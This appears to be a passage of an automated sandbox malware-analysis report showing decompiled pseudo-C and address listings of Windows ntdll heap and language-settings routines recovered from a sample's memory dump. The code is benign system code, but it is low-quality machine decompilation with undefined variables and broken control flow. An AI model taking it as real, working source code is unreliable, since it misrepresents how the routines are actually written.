							if(_v8 != 0) {
								L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L017D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E017FF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01801370(_t276, 0x1794e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E017FBB40(0,  &_v68, _t170);
									if(L017C43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E017FBB40(_t257,  &_v68, _t243);
								if(L017C43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01801370(_t278, 0x1794e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L017D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E017FF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01801370(_v16, 0x1794e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E017FBB40(_t262,  &_v68, _t244);
								if(L017C43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01801370(_t282, 0x1794e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E017FBB40(_t262,  &_v68, _t201);
							if(L017C43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L017D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E017FF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01801370(_t280, 0x1794e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E017FBB40(_t267,  &_v68, _t245);
							if(L017C43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01801370(_t284, 0x1794e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E017FBB40(_t267,  &_v68, _t224);
						if(L017C43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                    0x017c3d3c
                                                    0x017c3d42
                                                    0x017c3d44
                                                    0x017c3d46
                                                    0x017c3d49
                                                    0x017c3d4c
                                                    0x017c3d4f
                                                    0x017c3d52
                                                    0x017c3d55
                                                    0x017c3d58
                                                    0x017c3d5b
                                                    0x017c3d5f
                                                    0x017c3d61
                                                    0x017c3d66
                                                    0x01818213
                                                    0x01818218
                                                    0x017c4085
                                                    0x017c4088
                                                    0x017c408e
                                                    0x017c4094
                                                    0x017c409a
                                                    0x017c40a0
                                                    0x017c40a6
                                                    0x017c40a9
                                                    0x017c40af
                                                    0x017c40b6
                                                    0x017c40bd
                                                    0x017c40bd
                                                    0x017c3d83
                                                    0x0181821f
                                                    0x01818229
                                                    0x01818238
                                                    0x01818238
                                                    0x0181823d
                                                    0x0181823d
                                                    0x017c3da0
                                                    0x017c3daf
                                                    0x017c3db5
                                                    0x017c3dba
                                                    0x017c3dba
                                                    0x017c3dd4
                                                    0x017c3e94
                                                    0x017c3eab
                                                    0x017c3f6d
                                                    0x017c3f84
                                                    0x017c406b
                                                    0x017c406b
                                                    0x017c406e
                                                    0x017c406e
                                                    0x017c4070
                                                    0x017c4074
                                                    0x01818351
                                                    0x01818351
                                                    0x017c407a
                                                    0x017c407f
                                                    0x0181835d
                                                    0x01818370
                                                    0x01818377
                                                    0x01818379
                                                    0x0181837c
                                                    0x0181837c
                                                    0x0181835d
                                                    0x00000000
                                                    0x017c407f
                                                    0x017c3f8a
                                                    0x017c3f8d
                                                    0x017c3f90
                                                    0x017c3f95
                                                    0x0181830d
                                                    0x0181830f
                                                    0x017c3f9b
                                                    0x017c3fac
                                                    0x017c3fae
                                                    0x017c3fb1
                                                    0x017c3fb1
                                                    0x017c3fb6
                                                    0x01818317
                                                    0x0181831a
                                                    0x00000000
                                                    0x017c3fbc
                                                    0x017c3fc1
                                                    0x017c3fc9
                                                    0x017c3fd7
                                                    0x017c3fda
                                                    0x017c3fdd
                                                    0x017c4021
                                                    0x017c4021
                                                    0x017c4029
                                                    0x017c4030
                                                    0x017c4044
                                                    0x017c4046
                                                    0x017c4046
                                                    0x017c4044
                                                    0x017c4049
                                                    0x01818327
                                                    0x01818334
                                                    0x01818339
                                                    0x0181833c
                                                    0x017c404f
                                                    0x017c404f
                                                    0x017c404f
                                                    0x017c4051
                                                    0x017c4056
                                                    0x017c4063
                                                    0x017c4063
                                                    0x017c4068
                                                    0x00000000
                                                    0x017c4068
                                                    0x017c3fdf
                                                    0x017c3fe2
                                                    0x017c3fe4
                                                    0x017c3fe7
                                                    0x017c3fef
                                                    0x017c4003
                                                    0x017c4005
                                                    0x017c4005
                                                    0x017c400c
                                                    0x017c4013
                                                    0x017c4016
                                                    0x017c4017
                                                    0x017c401b
                                                    0x017c401e
                                                    0x00000000
                                                    0x017c401e
                                                    0x017c3fb6
                                                    0x017c3eb1
                                                    0x017c3eb4
                                                    0x017c3eb7
                                                    0x017c3ebc
                                                    0x018182a9
                                                    0x018182ab
                                                    0x017c3ec2
                                                    0x017c3ed3
                                                    0x017c3ed5
                                                    0x017c3ed8
                                                    0x017c3ed8
                                                    0x017c3edd
                                                    0x018182b3
                                                    0x018182b6
                                                    0x00000000
                                                    0x017c3ee3
                                                    0x017c3ee8
                                                    0x017c3eed
                                                    0x017c3ef0
                                                    0x017c3ef3
                                                    0x017c3f02
                                                    0x017c3f05
                                                    0x017c3f08
                                                    0x018182c0
                                                    0x018182c3
                                                    0x018182c5
                                                    0x018182c8
                                                    0x018182d0
                                                    0x018182e4
                                                    0x018182e6
                                                    0x018182e6
                                                    0x018182ed
                                                    0x018182f4
                                                    0x018182f7
                                                    0x018182f8
                                                    0x018182fc
                                                    0x018182ff
                                                    0x018182ff
                                                    0x017c3f0e
                                                    0x017c3f11
                                                    0x017c3f16
                                                    0x017c3f1d
                                                    0x017c3f31
                                                    0x01818307
                                                    0x01818307
                                                    0x017c3f31
                                                    0x017c3f39
                                                    0x017c3f48
                                                    0x017c3f4d
                                                    0x017c3f50
                                                    0x017c3f50
                                                    0x017c3f53
                                                    0x017c3f58
                                                    0x017c3f65
                                                    0x017c3f65
                                                    0x017c3f6a
                                                    0x00000000
                                                    0x017c3f6a
                                                    0x017c3edd
                                                    0x017c3dda
                                                    0x017c3ddd
                                                    0x017c3de0
                                                    0x017c3de5
                                                    0x01818245
                                                    0x017c3deb
                                                    0x017c3df7
                                                    0x017c3dfc
                                                    0x017c3dfe
                                                    0x017c3e01
                                                    0x017c3e01
                                                    0x017c3e06
                                                    0x0181824d
                                                    0x0181824f
                                                    0x01818254
                                                    0x00000000
                                                    0x017c3e0c
                                                    0x017c3e11
                                                    0x017c3e16
                                                    0x017c3e19
                                                    0x017c3e29
                                                    0x017c3e2c
                                                    0x017c3e2f
                                                    0x0181825c
                                                    0x0181825f
                                                    0x01818261
                                                    0x01818264
                                                    0x0181826c
                                                    0x01818280
                                                    0x01818282
                                                    0x01818282
                                                    0x01818289
                                                    0x01818290
                                                    0x01818293
                                                    0x01818294
                                                    0x01818298
                                                    0x0181829b
                                                    0x0181829b
                                                    0x017c3e35
                                                    0x017c3e38
                                                    0x017c3e3d
                                                    0x017c3e44
                                                    0x017c3e58
                                                    0x018182a3
                                                    0x018182a3
                                                    0x017c3e58
                                                    0x017c3e60
                                                    0x017c3e6f
                                                    0x017c3e74
                                                    0x017c3e77
                                                    0x017c3e77
                                                    0x017c3e7a
                                                    0x017c3e7f
                                                    0x017c3e8c
                                                    0x017c3e8c
                                                    0x017c3e91
                                                    0x00000000
                                                    0x017c3e91

                                                    Strings
                                                    • Kernel-MUI-Language-SKU, xrefs: 017C3F70
                                                    • WindowsExcludedProcs, xrefs: 017C3D6F
                                                    • Kernel-MUI-Language-Allowed, xrefs: 017C3DC0
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 017C3E97
                                                    • Kernel-MUI-Number-Allowed, xrefs: 017C3D8C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 0-258546922
                                                    • Opcode ID: 2aa3c55cc93e1c966c0547dcef29386fba833f41c7e9cc48169b3896fc823690
                                                    • Instruction ID: f55fdb2a58fb8b1e7959f2632a89503792fff84fb9a22ced9f178f90ce2bf664
                                                    • Opcode Fuzzy Hash: 2aa3c55cc93e1c966c0547dcef29386fba833f41c7e9cc48169b3896fc823690
                                                    • Instruction Fuzzy Hash: 47F12972D00619EBCB16DF98C984AEEFBB9FF48B50F15406EE906E7254D7349A018B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017B40E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 29%
                                                    			E017B40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017BB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E017BB150(", passed to %s", _t29);
					}
					_push("\n");
					E017BB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x18a6378 = 1;
						asm("int3");
						 *0x18a6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                    0x017b40e6
                                                    0x017b40e8
                                                    0x017b40f1
                                                    0x0181042d
                                                    0x0181044c
                                                    0x01810451
                                                    0x0181042f
                                                    0x01810444
                                                    0x01810449
                                                    0x0181045d
                                                    0x01810466
                                                    0x0181046e
                                                    0x01810474
                                                    0x01810475
                                                    0x0181047a
                                                    0x0181048a
                                                    0x0181048c
                                                    0x01810493
                                                    0x01810494
                                                    0x01810494
                                                    0x00000000
                                                    0x0181049b
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                    • API String ID: 0-188067316
                                                    • Opcode ID: 81d49f05fbfd9a41b419d35d463ae7d92146cef047fc31aeec3af1b2fbc8e1b8
                                                    • Instruction ID: 18192cead553a2258360aff1eafa523643c789eb9ae874ce605ba16e66e44091
                                                    • Opcode Fuzzy Hash: 81d49f05fbfd9a41b419d35d463ae7d92146cef047fc31aeec3af1b2fbc8e1b8
                                                    • Instruction Fuzzy Hash: D40128331402459EE325976DF8DEF92F7ACDB00B34F28806EF409876499BA89584C614
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017DA830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
                                                    			E017DA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x18a8748 - 1;
					if( *0x18a8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E017BB150();
									_t260 = _t257 + 4;
								} else {
									E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E017BB150();
								_t257 = _t260 + 4;
								__eflags =  *0x18a7bc8;
								if(__eflags == 0) {
									E01872073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0187A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0180D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E017DAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0187A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0187A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x18a8748 - 1;
					if( *0x18a8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E017BB150();
							} else {
								E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E017BB150();
							__eflags =  *0x18a7bc8;
							if(__eflags == 0) {
								_t131 = E01872073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                    0x017da83a
                                                    0x017da83c
                                                    0x017da83e
                                                    0x017da841
                                                    0x017da844
                                                    0x017da84a
                                                    0x017daa53
                                                    0x017daa59
                                                    0x017daa59
                                                    0x017da858
                                                    0x017da85e
                                                    0x017daaf5
                                                    0x017daafc
                                                    0x0182229e
                                                    0x018222a2
                                                    0x018222a8
                                                    0x018222b3
                                                    0x018222b5
                                                    0x018222bb
                                                    0x018222c1
                                                    0x018222c5
                                                    0x018222e6
                                                    0x018222eb
                                                    0x018222f0
                                                    0x018222c7
                                                    0x018222dc
                                                    0x018222e1
                                                    0x018222e1
                                                    0x018222f3
                                                    0x018222f8
                                                    0x018222fd
                                                    0x01822300
                                                    0x01822307
                                                    0x0182230e
                                                    0x0182230e
                                                    0x01822313
                                                    0x01822313
                                                    0x018222b5
                                                    0x018222a2
                                                    0x017daafc
                                                    0x017da864
                                                    0x017da869
                                                    0x017daa5c
                                                    0x017daa5e
                                                    0x017da86f
                                                    0x017da87f
                                                    0x017da885
                                                    0x017da885
                                                    0x017da88b
                                                    0x017da890
                                                    0x017da896
                                                    0x017dab0c
                                                    0x017dab0f
                                                    0x017dab15
                                                    0x01822320
                                                    0x01822320
                                                    0x017dab1b
                                                    0x017da89c
                                                    0x017da89f
                                                    0x017da8a2
                                                    0x017da8a2
                                                    0x017da8a5
                                                    0x017da8af
                                                    0x017da8b3
                                                    0x017da8b8
                                                    0x017daa66
                                                    0x017da8be
                                                    0x017da8c5
                                                    0x017da8c6
                                                    0x017da8ce
                                                    0x01822328
                                                    0x01822332
                                                    0x01822337
                                                    0x01822337
                                                    0x017da8ce
                                                    0x017da8d4
                                                    0x017da8d8
                                                    0x017da8db
                                                    0x017da8de
                                                    0x017da8e1
                                                    0x017da8e5
                                                    0x017da8e8
                                                    0x017da8f0
                                                    0x017da8f3
                                                    0x0182234c
                                                    0x01822350
                                                    0x01822355
                                                    0x01822359
                                                    0x01822359
                                                    0x017da8f9
                                                    0x017da901
                                                    0x017daae4
                                                    0x017daae4
                                                    0x017daaea
                                                    0x00000000
                                                    0x017da907
                                                    0x017da90a
                                                    0x017da91d
                                                    0x017da91d
                                                    0x00000000
                                                    0x017da910
                                                    0x017da910
                                                    0x017da910
                                                    0x017da914
                                                    0x017da924
                                                    0x017da924
                                                    0x017da924
                                                    0x017da924
                                                    0x017da916
                                                    0x017da91b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017da91b
                                                    0x017da925
                                                    0x017da925
                                                    0x017da932
                                                    0x017da936
                                                    0x017da93c
                                                    0x017da93c
                                                    0x017da93c
                                                    0x017dab22
                                                    0x017dab24
                                                    0x017dab27
                                                    0x017dab27
                                                    0x017da942
                                                    0x017da944
                                                    0x017daaba
                                                    0x017daabd
                                                    0x017daac0
                                                    0x017daac0
                                                    0x017daac2
                                                    0x017dab2f
                                                    0x017daac4
                                                    0x017daac4
                                                    0x017daac7
                                                    0x017daaca
                                                    0x017daacc
                                                    0x017daace
                                                    0x017daace
                                                    0x017daace
                                                    0x017daad1
                                                    0x017daad1
                                                    0x017daad7
                                                    0x017daad9
                                                    0x00000000
                                                    0x00000000
                                                    0x01822361
                                                    0x01822369
                                                    0x0182236b
                                                    0x00000000
                                                    0x01822371
                                                    0x00000000
                                                    0x01822371
                                                    0x00000000
                                                    0x0182236b
                                                    0x017daac0
                                                    0x017da94a
                                                    0x017da94a
                                                    0x017da94d
                                                    0x017da94d
                                                    0x017da950
                                                    0x017da954
                                                    0x01822376
                                                    0x01822380
                                                    0x017da95a
                                                    0x017da95a
                                                    0x017da95c
                                                    0x017da95f
                                                    0x017da961
                                                    0x017da961
                                                    0x017da967
                                                    0x017da96a
                                                    0x017da972
                                                    0x017daa02
                                                    0x017daa06
                                                    0x017daa10
                                                    0x017daa16
                                                    0x017daa16
                                                    0x017daa1b
                                                    0x017daa21
                                                    0x017daa24
                                                    0x017daa27
                                                    0x017daa29
                                                    0x017daa2c
                                                    0x017daa32
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017da978
                                                    0x017da978
                                                    0x017da97b
                                                    0x017da981
                                                    0x017da996
                                                    0x017da998
                                                    0x017da99f
                                                    0x017da9a2
                                                    0x0182238a
                                                    0x017da9a8
                                                    0x017da9a8
                                                    0x017da9a8
                                                    0x017da9aa
                                                    0x017da9ad
                                                    0x017da9b0
                                                    0x017da9bb
                                                    0x017da9be
                                                    0x017da9c7
                                                    0x017da9c9
                                                    0x017da9c9
                                                    0x017da9cc
                                                    0x017da9d1
                                                    0x017daa6d
                                                    0x017daa70
                                                    0x017daa73
                                                    0x017daa75
                                                    0x017daa79
                                                    0x017daa7e
                                                    0x017daa82
                                                    0x017daa8f
                                                    0x017daa94
                                                    0x017daa96
                                                    0x01822392
                                                    0x018223a1
                                                    0x018223a1
                                                    0x017daa9c
                                                    0x017daa9f
                                                    0x017daaa2
                                                    0x017daaa2
                                                    0x017daaa8
